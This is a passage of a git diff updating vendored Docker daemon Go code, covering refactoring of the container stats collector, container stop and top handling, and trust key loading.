 func (daemon *Daemon) unsubscribeToContainerStats(c *container.Container, ch chan interface{}) {
-	daemon.statsCollector.unsubscribe(c, ch)
+	daemon.statsCollector.Unsubscribe(c, ch)
 }
 
 // GetContainerStats collects all the stats published by a container
diff --git a/vendor/github.com/docker/docker/daemon/stats/collector.go b/vendor/github.com/docker/docker/daemon/stats/collector.go
new file mode 100644
index 0000000000..88e20984bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats/collector.go
@@ -0,0 +1,159 @@
+package stats // import "github.com/docker/docker/daemon/stats"
+
+import (
+	"bufio"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/pubsub"
+	"github.com/sirupsen/logrus"
+)
+
+// Collector manages and provides container resource stats
+type Collector struct {
+	m          sync.Mutex
+	supervisor supervisor
+	interval   time.Duration
+	publishers map[*container.Container]*pubsub.Publisher
+	bufReader  *bufio.Reader
+
+	// The following fields are not set on Windows currently.
+	clockTicksPerSecond uint64
+}
+
+// NewCollector creates a stats collector that will poll the supervisor with the specified interval
+func NewCollector(supervisor supervisor, interval time.Duration) *Collector {
+	s := &Collector{
+		interval:   interval,
+		supervisor: supervisor,
+		publishers: make(map[*container.Container]*pubsub.Publisher),
+		bufReader:  bufio.NewReaderSize(nil, 128),
+	}
+
+	platformNewStatsCollector(s)
+
+	return s
+}
+
+type supervisor interface {
+	// GetContainerStats collects all the stats related to a container
+	GetContainerStats(container *container.Container) (*types.StatsJSON, error)
+}
+
+// Collect registers the container with the collector and adds it to
+// the event loop for collection on the specified interval returning
+// a channel for the subscriber to receive on.
+func (s *Collector) Collect(c *container.Container) chan interface{} {
+	s.m.Lock()
+	defer s.m.Unlock()
+	publisher, exists := s.publishers[c]
+	if !exists {
+		publisher = pubsub.NewPublisher(100*time.Millisecond, 1024)
+		s.publishers[c] = publisher
+	}
+	return publisher.Subscribe()
+}
+
+// StopCollection closes the channels for all subscribers and removes
+// the container from metrics collection.
+func (s *Collector) StopCollection(c *container.Container) {
+	s.m.Lock()
+	if publisher, exists := s.publishers[c]; exists {
+		publisher.Close()
+		delete(s.publishers, c)
+	}
+	s.m.Unlock()
+}
+
+// Unsubscribe removes a specific subscriber from receiving updates for a container's stats.
+func (s *Collector) Unsubscribe(c *container.Container, ch chan interface{}) {
+	s.m.Lock()
+	publisher := s.publishers[c]
+	if publisher != nil {
+		publisher.Evict(ch)
+		if publisher.Len() == 0 {
+			delete(s.publishers, c)
+		}
+	}
+	s.m.Unlock()
+}
+
+// Run starts the collectors and will indefinitely collect stats from the supervisor
+func (s *Collector) Run() {
+	type publishersPair struct {
+		container *container.Container
+		publisher *pubsub.Publisher
+	}
+	// we cannot determine the capacity here.
+	// it will grow enough in first iteration
+	var pairs []publishersPair
+
+	for {
+		// Put sleep at the start so that it will always be hit,
+		// preventing a tight loop if no stats are collected.
+		time.Sleep(s.interval)
+
+		// it does not make sense in the first iteration,
+		// but saves allocations in further iterations
+		pairs = pairs[:0]
+
+		s.m.Lock()
+		for container, publisher := range s.publishers {
+			// copy pointers here to release the lock ASAP
+			pairs = append(pairs, publishersPair{container, publisher})
+		}
+		s.m.Unlock()
+		if len(pairs) == 0 {
+			continue
+		}
+
+		onlineCPUs, err := s.getNumberOnlineCPUs()
+		if err != nil {
+			logrus.Errorf("collecting system online cpu count: %v", err)
+			continue
+		}
+
+		for _, pair := range pairs {
+			stats, err := s.supervisor.GetContainerStats(pair.container)
+
+			switch err.(type) {
+			case nil:
+				// Sample system CPU usage close to container usage to avoid
+				// noise in metric calculations.
+				systemUsage, err := s.getSystemCPUUsage()
+				if err != nil {
+					logrus.WithError(err).WithField("container_id", pair.container.ID).Errorf("collecting system cpu usage")
+					continue
+				}
+
+				// FIXME: move to containerd on Linux (not Windows)
+				stats.CPUStats.SystemUsage = systemUsage
+				stats.CPUStats.OnlineCPUs = onlineCPUs
+
+				pair.publisher.Publish(*stats)
+
+			case notRunningErr, notFoundErr:
+				// publish empty stats containing only name and ID if not running or not found
+				pair.publisher.Publish(types.StatsJSON{
+					Name: pair.container.Name,
+					ID:   pair.container.ID,
+				})
+
+			default:
+				logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err)
+			}
+		}
+	}
+}
+
+type notRunningErr interface {
+	error
+	Conflict()
+}
+
+type notFoundErr interface {
+	error
+	NotFound()
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go b/vendor/github.com/docker/docker/daemon/stats/collector_unix.go
similarity index 69%
rename from vendor/github.com/docker/docker/daemon/stats_collector_unix.go
rename to vendor/github.com/docker/docker/daemon/stats/collector_unix.go
index 0fcc9c5828..2480aceb51 100644
--- a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go
+++ b/vendor/github.com/docker/docker/daemon/stats/collector_unix.go
@@ -1,6 +1,6 @@
-// +build !windows,!solaris
+// +build !windows
 
-package daemon
+package stats // import "github.com/docker/docker/daemon/stats"
 
 import (
 	"fmt"
@@ -8,18 +8,18 @@ import (
 	"strconv"
 	"strings"
 
-	sysinfo "github.com/docker/docker/pkg/system"
 	"github.com/opencontainers/runc/libcontainer/system"
 )
 
+/*
+#include <unistd.h>
+*/
+import "C"
+
 // platformNewStatsCollector performs platform specific initialisation of the
-// statsCollector structure.
-func platformNewStatsCollector(s *statsCollector) {
+// Collector structure.
+func platformNewStatsCollector(s *Collector) {
 	s.clockTicksPerSecond = uint64(system.GetClockTicks())
-	meminfo, err := sysinfo.ReadMemInfo()
-	if err == nil && meminfo.MemTotal > 0 {
-		s.machineMemory = uint64(meminfo.MemTotal)
-	}
 }
 
 const nanoSecondsPerSecond = 1e9
@@ -32,7 +32,7 @@ const nanoSecondsPerSecond = 1e9
 // statistics line and then sums up the first seven fields
 // provided. See `man 5 proc` for details on specific field
 // information.
-func (s *statsCollector) getSystemCPUUsage() (uint64, error) {
+func (s *Collector) getSystemCPUUsage() (uint64, error) {
 	var line string
 	f, err := os.Open("/proc/stat")
 	if err != nil {
@@ -69,3 +69,15 @@ func (s *statsCollector) getSystemCPUUsage() (uint64, error) {
 	}
 	return 0, fmt.Errorf("invalid stat format. Error trying to parse the '/proc/stat' file")
 }
+
+func (s *Collector) getNumberOnlineCPUs() (uint32, error) {
+	i, err := C.sysconf(C._SC_NPROCESSORS_ONLN)
+	// According to POSIX - errno is undefined after successful
+	// sysconf, and can be non-zero in several cases, so look for
+	// error in returned value not in errno.
+	// (https://sourceware.org/bugzilla/show_bug.cgi?id=21536)
+	if i == -1 {
+		return 0, err
+	}
+	return uint32(i), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats/collector_windows.go b/vendor/github.com/docker/docker/daemon/stats/collector_windows.go
new file mode 100644
index 0000000000..018e9065f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats/collector_windows.go
@@ -0,0 +1,17 @@
+package stats // import "github.com/docker/docker/daemon/stats"
+
+// platformNewStatsCollector performs platform specific initialisation of the
+// Collector structure. This is a no-op on Windows.
+func platformNewStatsCollector(s *Collector) {
+}
+
+// getSystemCPUUsage returns the host system's cpu usage in
+// nanoseconds. An error is returned if the format of the underlying
+// file does not match. This is a no-op on Windows.
+func (s *Collector) getSystemCPUUsage() (uint64, error) {
+	return 0, nil
+}
+
+func (s *Collector) getNumberOnlineCPUs() (uint32, error) {
+	return 0, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector.go b/vendor/github.com/docker/docker/daemon/stats_collector.go
index dc6825e705..0490b2ea15 100644
--- a/vendor/github.com/docker/docker/daemon/stats_collector.go
+++ b/vendor/github.com/docker/docker/daemon/stats_collector.go
@@ -1,132 +1,26 @@
-// +build !solaris
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"bufio"
-	"sync"
+	"runtime"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/pkg/pubsub"
+	"github.com/docker/docker/daemon/stats"
+	"github.com/docker/docker/pkg/system"
 )
 
-type statsSupervisor interface {
-	// GetContainerStats collects all the stats related to a container
-	GetContainerStats(container *container.Container) (*types.StatsJSON, error)
-}
-
 // newStatsCollector returns a new statsCollector that collections
 // stats for a registered container at the specified interval.
 // The collector allows non-running containers to be added
 // and will start processing stats when they are started.
-func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector {
-	s := &statsCollector{
-		interval:   interval,
-		supervisor: daemon,
-		publishers: make(map[*container.Container]*pubsub.Publisher),
-		bufReader:  bufio.NewReaderSize(nil, 128),
-	}
-	platformNewStatsCollector(s)
-	go s.run()
-	return s
-}
-
-// statsCollector manages and provides container resource stats
-type statsCollector struct {
-	m          sync.Mutex
-	supervisor statsSupervisor
-	interval   time.Duration
-	publishers map[*container.Container]*pubsub.Publisher
-	bufReader  *bufio.Reader
-
-	// The following fields are not set on Windows currently.
-	clockTicksPerSecond uint64
-	machineMemory       uint64
-}
-
-// collect registers the container with the collector and adds it to
-// the event loop for collection on the specified interval returning
-// a channel for the subscriber to receive on.
-func (s *statsCollector) collect(c *container.Container) chan interface{} {
-	s.m.Lock()
-	defer s.m.Unlock()
-	publisher, exists := s.publishers[c]
-	if !exists {
-		publisher = pubsub.NewPublisher(100*time.Millisecond, 1024)
-		s.publishers[c] = publisher
-	}
-	return publisher.Subscribe()
-}
-
-// stopCollection closes the channels for all subscribers and removes
-// the container from metrics collection.
-func (s *statsCollector) stopCollection(c *container.Container) {
-	s.m.Lock()
-	if publisher, exists := s.publishers[c]; exists {
-		publisher.Close()
-		delete(s.publishers, c)
-	}
-	s.m.Unlock()
-}
-
-// unsubscribe removes a specific subscriber from receiving updates for a container's stats.
-func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) {
-	s.m.Lock()
-	publisher := s.publishers[c]
-	if publisher != nil {
-		publisher.Evict(ch)
-		if publisher.Len() == 0 {
-			delete(s.publishers, c)
-		}
-	}
-	s.m.Unlock()
-}
-
-func (s *statsCollector) run() {
-	type publishersPair struct {
-		container *container.Container
-		publisher *pubsub.Publisher
-	}
-	// we cannot determine the capacity here.
-	// it will grow enough in first iteration
-	var pairs []publishersPair
-
-	for range time.Tick(s.interval) {
-		// it does not make sense in the first iteration,
-		// but saves allocations in further iterations
-		pairs = pairs[:0]
-
-		s.m.Lock()
-		for container, publisher := range s.publishers {
-			// copy pointers here to release the lock ASAP
-			pairs = append(pairs, publishersPair{container, publisher})
-		}
-		s.m.Unlock()
-		if len(pairs) == 0 {
-			continue
-		}
-
-		systemUsage, err := s.getSystemCPUUsage()
-		if err != nil {
-			logrus.Errorf("collecting system cpu usage: %v", err)
-			continue
-		}
-
-		for _, pair := range pairs {
-			stats, err := s.supervisor.GetContainerStats(pair.container)
-			if err != nil {
-				if _, ok := err.(errNotRunning); !ok {
-					logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err)
-				}
-				continue
-			}
-			// FIXME: move to containerd on Linux (not Windows)
-			stats.CPUStats.SystemUsage = systemUsage
-
-			pair.publisher.Publish(*stats)
+func (daemon *Daemon) newStatsCollector(interval time.Duration) *stats.Collector {
+	// FIXME(vdemeester) move this elsewhere
+	if runtime.GOOS == "linux" {
+		meminfo, err := system.ReadMemInfo()
+		if err == nil && meminfo.MemTotal > 0 {
+			daemon.machineMemory = uint64(meminfo.MemTotal)
 		}
 	}
+	s := stats.NewCollector(daemon, interval)
+	go s.Run()
+	return s
 }
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go
deleted file mode 100644
index 9cf9f0a94e..0000000000
--- a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go
+++ /dev/null
@@ -1,34 +0,0 @@
-package daemon
-
-import (
-	"github.com/docker/docker/container"
-	"time"
-)
-
-// newStatsCollector returns a new statsCollector for collection stats
-// for a registered container at the specified interval. The collector allows
-// non-running containers to be added and will start processing stats when
-// they are started.
-func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector {
-	return &statsCollector{}
-}
-
-// statsCollector manages and provides container resource stats
-type statsCollector struct {
-}
-
-// collect registers the container with the collector and adds it to
-// the event loop for collection on the specified interval returning
-// a channel for the subscriber to receive on.
-func (s *statsCollector) collect(c *container.Container) chan interface{} {
-	return nil
-}
-
-// stopCollection closes the channels for all subscribers and removes
-// the container from metrics collection.
-func (s *statsCollector) stopCollection(c *container.Container) {
-}
-
-// unsubscribe removes a specific subscriber from receiving updates for a container's stats.
-func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) {
-}
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go
deleted file mode 100644
index 41731b9c14..0000000000
--- a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go
+++ /dev/null
@@ -1,15 +0,0 @@
-// +build windows
-
-package daemon
-
-// platformNewStatsCollector performs platform specific initialisation of the
-// statsCollector structure. This is a no-op on Windows.
-func platformNewStatsCollector(s *statsCollector) {
-}
-
-// getSystemCPUUsage returns the host system's cpu usage in
-// nanoseconds. An error is returned if the format of the underlying
-// file does not match. This is a no-op on Windows.
-func (s *statsCollector) getSystemCPUUsage() (uint64, error) {
-	return 0, nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/stats_unix.go b/vendor/github.com/docker/docker/daemon/stats_unix.go
index d875607b3a..ee78ca688b 100644
--- a/vendor/github.com/docker/docker/daemon/stats_unix.go
+++ b/vendor/github.com/docker/docker/daemon/stats_unix.go
@@ -1,12 +1,11 @@
 // +build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"fmt"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/container"
+	"github.com/pkg/errors"
 )
 
 // Resolve Network SandboxID in case the container reuse another container's network stack
@@ -16,7 +15,7 @@ func (daemon *Daemon) getNetworkSandboxID(c *container.Container) (string, error
 		containerID := curr.HostConfig.NetworkMode.ConnectedContainer()
 		connected, err := daemon.GetContainer(containerID)
 		if err != nil {
-			return "", fmt.Errorf("Could not get container for %s", containerID)
+			return "", errors.Wrapf(err, "Could not get container for %s", containerID)
 		}
 		curr = connected
 	}
diff --git a/vendor/github.com/docker/docker/daemon/stats_windows.go b/vendor/github.com/docker/docker/daemon/stats_windows.go
index f8e6f6f84a..0306332b48 100644
--- a/vendor/github.com/docker/docker/daemon/stats_windows.go
+++ b/vendor/github.com/docker/docker/daemon/stats_windows.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"github.com/docker/docker/api/types"
diff --git a/vendor/github.com/docker/docker/daemon/stop.go b/vendor/github.com/docker/docker/daemon/stop.go
index aa7b3820c8..c3ac09056a 100644
--- a/vendor/github.com/docker/docker/daemon/stop.go
+++ b/vendor/github.com/docker/docker/daemon/stop.go
@@ -1,58 +1,53 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"fmt"
-	"net/http"
+	"context"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/errors"
-	"github.com/docker/docker/container"
+	containerpkg "github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
-// ContainerStop looks for the given container and terminates it,
-// waiting the given number of seconds before forcefully killing the
-// container. If a negative number of seconds is given, ContainerStop
-// will wait for a graceful termination. An error is returned if the
-// container is not found, is already stopped, or if there is a
-// problem stopping the container.
-func (daemon *Daemon) ContainerStop(name string, seconds *int) error {
+// ContainerStop looks for the given container and stops it.
+// In case the container fails to stop gracefully within a time duration
+// specified by the timeout argument, in seconds, it is forcefully
+// terminated (killed).
+//
+// If the timeout is nil, the container's StopTimeout value is used, if set,
+// otherwise the engine default. A negative timeout value can be specified,
+// meaning no timeout, i.e. no forceful termination is performed.
+func (daemon *Daemon) ContainerStop(name string, timeout *int) error {
 	container, err := daemon.GetContainer(name)
 	if err != nil {
 		return err
 	}
 	if !container.IsRunning() {
-		err := fmt.Errorf("Container %s is already stopped", name)
-		return errors.NewErrorWithStatusCode(err, http.StatusNotModified)
+		return containerNotModifiedError{running: false}
 	}
-	if seconds == nil {
+	if timeout == nil {
 		stopTimeout := container.StopTimeout()
-		seconds = &stopTimeout
+		timeout = &stopTimeout
 	}
-	if err := daemon.containerStop(container, *seconds); err != nil {
-		return fmt.Errorf("Cannot stop container %s: %v", name, err)
+	if err := daemon.containerStop(container, *timeout); err != nil {
+		return errdefs.System(errors.Wrapf(err, "cannot stop container: %s", name))
 	}
 	return nil
 }
 
-// containerStop halts a container by sending a stop signal, waiting for the given
-// duration in seconds, and then calling SIGKILL and waiting for the
-// process to exit. If a negative duration is given, Stop will wait
-// for the initial signal forever. If the container is not running Stop returns
-// immediately.
-func (daemon *Daemon) containerStop(container *container.Container, seconds int) error {
+// containerStop sends a stop signal, waits, sends a kill signal.
+func (daemon *Daemon) containerStop(container *containerpkg.Container, seconds int) error {
 	if !container.IsRunning() {
 		return nil
 	}
 
-	daemon.stopHealthchecks(container)
-
 	stopSignal := container.StopSignal()
 	// 1. Send a stop signal
 	if err := daemon.killPossiblyDeadProcess(container, stopSignal); err != nil {
 		// While normally we might "return err" here we're not going to
 		// because if we can't stop the container by this point then
-		// its probably because its already stopped. Meaning, between
+		// it's probably because it's already stopped. Meaning, between
 		// the time of the IsRunning() call above and now it stopped.
 		// Also, since the err return will be environment specific we can't
 		// look for any particular (common) error that would indicate
@@ -60,7 +55,10 @@ func (daemon *Daemon) containerStop(container *container.Container, seconds int)
 		// So, instead we'll give it up to 2 more seconds to complete and if
 		// by that time the container is still running, then the error
 		// we got is probably valid and so we force kill it.
-		if _, err := container.WaitStop(2 * time.Second); err != nil {
+		ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
+		defer cancel()
+
+		if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil {
 			logrus.Infof("Container failed to stop after sending signal %d to the process, force killing", stopSignal)
 			if err := daemon.killPossiblyDeadProcess(container, 9); err != nil {
 				return err
@@ -69,11 +67,19 @@ func (daemon *Daemon) containerStop(container *container.Container, seconds int)
 	}
 
 	// 2. Wait for the process to exit on its own
-	if _, err := container.WaitStop(time.Duration(seconds) * time.Second); err != nil {
+	ctx := context.Background()
+	if seconds >= 0 {
+		var cancel context.CancelFunc
+		ctx, cancel = context.WithTimeout(ctx, time.Duration(seconds)*time.Second)
+		defer cancel()
+	}
+
+	if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil {
 		logrus.Infof("Container %v failed to exit within %d seconds of signal %d - using the force", container.ID, seconds, stopSignal)
 		// 3. If it doesn't, then send SIGKILL
 		if err := daemon.Kill(container); err != nil {
-			container.WaitStop(-1 * time.Second)
+			// Wait without a timeout, ignore result.
+			<-container.Wait(context.Background(), containerpkg.WaitConditionNotRunning)
 			logrus.Warn(err) // Don't return error because we only care that container is stopped, not what function stopped it
 		}
 	}
diff --git a/vendor/github.com/docker/docker/api/fixtures/keyfile b/vendor/github.com/docker/docker/daemon/testdata/keyfile
similarity index 100%
rename from vendor/github.com/docker/docker/api/fixtures/keyfile
rename to vendor/github.com/docker/docker/daemon/testdata/keyfile
diff --git a/vendor/github.com/docker/docker/daemon/top_unix.go b/vendor/github.com/docker/docker/daemon/top_unix.go
index 7fb81d0148..99ca56f0f4 100644
--- a/vendor/github.com/docker/docker/daemon/top_unix.go
+++ b/vendor/github.com/docker/docker/daemon/top_unix.go
@@ -1,21 +1,26 @@
 //+build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"bytes"
+	"context"
 	"fmt"
 	"os/exec"
 	"regexp"
 	"strconv"
 	"strings"
 
-	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
 )
 
 func validatePSArgs(psArgs string) error {
 	// NOTE: \\s does not detect unicode whitespaces.
 	// So we use fieldsASCII instead of strings.Fields in parsePSOutput.
 	// See https://github.com/docker/docker/pull/24358
+	// nolint: gosimple
 	re := regexp.MustCompile("\\s+([^\\s]*)=\\s*(PID[^\\s]*)")
 	for _, group := range re.FindAllStringSubmatch(psArgs, -1) {
 		if len(group) >= 3 {
@@ -41,8 +46,25 @@ func fieldsASCII(s string) []string {
 	return strings.FieldsFunc(s, fn)
 }
 
-func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, error) {
-	procList := &types.ContainerProcessList{}
+func appendProcess2ProcList(procList *container.ContainerTopOKBody, fields []string) {
+	// Make sure number of fields equals number of header titles
+	// merging "overhanging" fields
+	process := fields[:len(procList.Titles)-1]
+	process = append(process, strings.Join(fields[len(procList.Titles)-1:], " "))
+	procList.Processes = append(procList.Processes, process)
+}
+
+func hasPid(procs []uint32, pid int) bool {
+	for _, p := range procs {
+		if int(p) == pid {
+			return true
+		}
+	}
+	return false
+}
+
+func parsePSOutput(output []byte, procs []uint32) (*container.ContainerTopOKBody, error) {
+	procList := &container.ContainerTopOKBody{}
 
 	lines := strings.Split(string(output), "\n")
 	procList.Titles = fieldsASCII(lines[0])
@@ -51,6 +73,7 @@ func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, erro
 	for i, name := range procList.Titles {
 		if name == "PID" {
 			pidIndex = i
+			break
 		}
 	}
 	if pidIndex == -1 {
@@ -58,35 +81,61 @@ func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, erro
 	}
 
 	// loop through the output and extract the PID from each line
+	// fixing #30580, be able to display thread line also when "m" option used
+	// in "docker top" client command
+	preContainedPidFlag := false
 	for _, line := range lines[1:] {
 		if len(line) == 0 {
 			continue
 		}
 		fields := fieldsASCII(line)
-		p, err := strconv.Atoi(fields[pidIndex])
+
+		var (
+			p   int
+			err error
+		)
+
+		if fields[pidIndex] == "-" {
+			if preContainedPidFlag {
+				appendProcess2ProcList(procList, fields)
+			}
+			continue
+		}
+		p, err = strconv.Atoi(fields[pidIndex])
 		if err != nil {
 			return nil, fmt.Errorf("Unexpected pid '%s': %s", fields[pidIndex], err)
 		}
 
-		for _, pid := range pids {
-			if pid == p {
-				// Make sure number of fields equals number of header titles
-				// merging "overhanging" fields
-				process := fields[:len(procList.Titles)-1]
-				process = append(process, strings.Join(fields[len(procList.Titles)-1:], " "))
-				procList.Processes = append(procList.Processes, process)
-			}
+		if hasPid(procs, p) {
+			preContainedPidFlag = true
+			appendProcess2ProcList(procList, fields)
+			continue
 		}
+		preContainedPidFlag = false
 	}
 	return procList, nil
 }
 
+// psPidsArg converts a slice of PIDs to a string consisting
+// of comma-separated list of PIDs prepended by "-q".
+// For example, psPidsArg([]uint32{1,2,3}) returns "-q1,2,3".
+func psPidsArg(pids []uint32) string {
+	b := []byte{'-', 'q'}
+	for i, p := range pids {
+		b = strconv.AppendUint(b, uint64(p), 10)
+		if i < len(pids)-1 {
+			b = append(b, ',')
+		}
+	}
+	return string(b)
+}
+
 // ContainerTop lists the processes running inside of the given
 // container by calling ps with the given args, or with the flags
 // "-ef" if no args are given.  An error is returned if the container
 // is not found, or is not running, or if there are any problems
 // running ps, or parsing the output.
-func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) {
+func (daemon *Daemon) ContainerTop(name string, psArgs string) (*container.ContainerTopOKBody, error) {
 	if psArgs == "" {
 		psArgs = "-ef"
 	}
@@ -101,23 +150,37 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container
 	}
 
 	if !container.IsRunning() {
-		return nil, errNotRunning{container.ID}
+		return nil, errNotRunning(container.ID)
 	}
 
 	if container.IsRestarting() {
 		return nil, errContainerIsRestarting(container.ID)
 	}
 
-	pids, err := daemon.containerd.GetPidsForContainer(container.ID)
+	procs, err := daemon.containerd.ListPids(context.Background(), container.ID)
 	if err != nil {
 		return nil, err
 	}
 
-	output, err := exec.Command("ps", strings.Split(psArgs, " ")...).Output()
+	args := strings.Split(psArgs, " ")
+	pids := psPidsArg(procs)
+	output, err := exec.Command("ps", append(args, pids)...).Output()
 	if err != nil {
-		return nil, fmt.Errorf("Error running ps: %v", err)
+		// some ps options (such as f) can't be used together with q,
+		// so retry without it
+		output, err = exec.Command("ps", args...).Output()
+		if err != nil {
+			if ee, ok := err.(*exec.ExitError); ok {
+				// first line of stderr shows why ps failed
+				line := bytes.SplitN(ee.Stderr, []byte{'\n'}, 2)
+				if len(line) > 0 && len(line[0]) > 0 {
+					err = errors.New(string(line[0]))
+				}
+			}
+			return nil, errdefs.System(errors.Wrap(err, "ps"))
+		}
 	}
-	procList, err := parsePSOutput(output, pids)
+	procList, err := parsePSOutput(output, procs)
 	if err != nil {
 		return nil, err
 	}
diff --git a/vendor/github.com/docker/docker/daemon/top_unix_test.go b/vendor/github.com/docker/docker/daemon/top_unix_test.go
index 269ab6e947..41cb3e1cd9 100644
--- a/vendor/github.com/docker/docker/daemon/top_unix_test.go
+++ b/vendor/github.com/docker/docker/daemon/top_unix_test.go
@@ -1,6 +1,6 @@
 //+build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"testing"
@@ -36,31 +36,34 @@ func TestContainerTopValidatePSArgs(t *testing.T) {
 func TestContainerTopParsePSOutput(t *testing.T) {
 	tests := []struct {
 		output      []byte
-		pids        []int
+		pids        []uint32
 		errExpected bool
 	}{
 		{[]byte(`  PID COMMAND
    42 foo
    43 bar
+		- -
   100 baz
-`), []int{42, 43}, false},
+`), []uint32{42, 43}, false},
 		{[]byte(`  UID COMMAND
    42 foo
    43 bar
+		- -
   100 baz
-`), []int{42, 43}, true},
+`), []uint32{42, 43}, true},
 		// unicode space (U+2003, 0xe2 0x80 0x83)
 		{[]byte(` PID COMMAND
    42 foo
    43 bar
+		- -
   100 baz
-`), []int{42, 43}, true},
+`), []uint32{42, 43}, true},
 		// the first space is U+2003, the second one is ascii.
 		{[]byte(` PID COMMAND
    42 foo
    43 bar
   100 baz
-`), []int{42, 43}, true},
+`), []uint32{42, 43}, true},
 	}
 
 	for _, f := range tests {
diff --git a/vendor/github.com/docker/docker/daemon/top_windows.go b/vendor/github.com/docker/docker/daemon/top_windows.go
index 3dd8ead468..1b3f843962 100644
--- a/vendor/github.com/docker/docker/daemon/top_windows.go
+++ b/vendor/github.com/docker/docker/daemon/top_windows.go
@@ -1,11 +1,12 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"errors"
 	"fmt"
 	"time"
 
-	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/go-units"
 )
 
@@ -23,7 +24,7 @@ import (
 //    task manager does and use the private working set as the memory counter.
 //    We could return more info for those who really understand how memory
 //    management works in Windows if we introduced a "raw" stats (above).
-func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) {
+func (daemon *Daemon) ContainerTop(name string, psArgs string) (*containertypes.ContainerTopOKBody, error) {
 	// It's not at all an equivalent to linux 'ps' on Windows
 	if psArgs != "" {
 		return nil, errors.New("Windows does not support arguments to top")
@@ -34,11 +35,19 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container
 		return nil, err
 	}
 
-	s, err := daemon.containerd.Summary(container.ID)
+	if !container.IsRunning() {
+		return nil, errNotRunning(container.ID)
+	}
+
+	if container.IsRestarting() {
+		return nil, errContainerIsRestarting(container.ID)
+	}
+
+	s, err := daemon.containerd.Summary(context.Background(), container.ID)
 	if err != nil {
 		return nil, err
 	}
-	procList := &types.ContainerProcessList{}
+	procList := &containertypes.ContainerTopOKBody{}
 	procList.Titles = []string{"Name", "PID", "CPU", "Private Working Set"}
 
 	for _, j := range s {
@@ -49,5 +58,6 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container
 			fmt.Sprintf("%02d:%02d:%02d.%03d", int(d.Hours()), int(d.Minutes())%60, int(d.Seconds())%60, int(d.Nanoseconds()/1000000)%1000),
 			units.HumanSize(float64(j.MemoryWorkingSetPrivateBytes))})
 	}
+
 	return procList, nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/trustkey.go b/vendor/github.com/docker/docker/daemon/trustkey.go
new file mode 100644
index 0000000000..bf00b6a3a0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/trustkey.go
@@ -0,0 +1,57 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"encoding/json"
+	"encoding/pem"
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/libtrust"
+)
+
+// LoadOrCreateTrustKey attempts to load the libtrust key at the given path,
+// otherwise generates a new one
+// TODO: this should use more of libtrust.LoadOrCreateTrustKey which may need
+// a refactor or this function to be moved into libtrust
+func loadOrCreateTrustKey(trustKeyPath string) (libtrust.PrivateKey, error) {
+	err := system.MkdirAll(filepath.Dir(trustKeyPath), 0700, "")
+	if err != nil {
+		return nil, err
+	}
+	trustKey, err := libtrust.LoadKeyFile(trustKeyPath)
+	if err == libtrust.ErrKeyFileDoesNotExist {
+		trustKey, err = libtrust.GenerateECP256PrivateKey()
+		if err != nil {
+			return nil, fmt.Errorf("Error generating key: %s", err)
+		}
+		encodedKey, err := serializePrivateKey(trustKey, filepath.Ext(trustKeyPath))
+		if err != nil {
+			return nil, fmt.Errorf("Error serializing key: %s", err)
+		}
+		if err := ioutils.AtomicWriteFile(trustKeyPath, encodedKey, os.FileMode(0600)); err != nil {
+			return nil, fmt.Errorf("Error saving key file: %s", err)
+		}
